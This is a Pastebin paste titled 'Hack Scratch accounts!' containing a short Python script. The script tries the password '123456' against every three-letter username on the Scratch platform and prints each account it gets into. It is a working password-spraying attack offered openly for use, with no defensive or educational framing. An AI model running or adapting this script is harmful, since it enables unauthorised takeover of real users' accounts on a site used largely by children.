paster442

Hack Scratch accounts! (Python)

Aug 28th, 2021 (edited)
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.58 KB | None | 0 0
  1. from scratchclient import ScratchSession as login, ScratchExceptions
  2.  
  3. def get_usernames():
  4.     usernames = list()
  5.     alphabet = "abcdefghijklmnopqrstuvwxyz"
  6.     for l1 in alphabet:
  7.         for l2 in alphabet:
  8.             for l3 in alphabet:
  9.                     usernames.append(l1 + l2 + l3)
  10.     return usernames
  11.  
  12. password = "123456"
  13. hacked = list()
  14. IncorrectPassword = ScratchExceptions.InvalidCredentialsException
  15.  
  16. for username in get_usernames():
  17.     try:
  18.         session = login(username, password)
  19.         hacked.append(username)
  20.         print(username)
  21.     except IncorrectPassword:
  22.         pass
Add Comment
Please, Sign In to add comment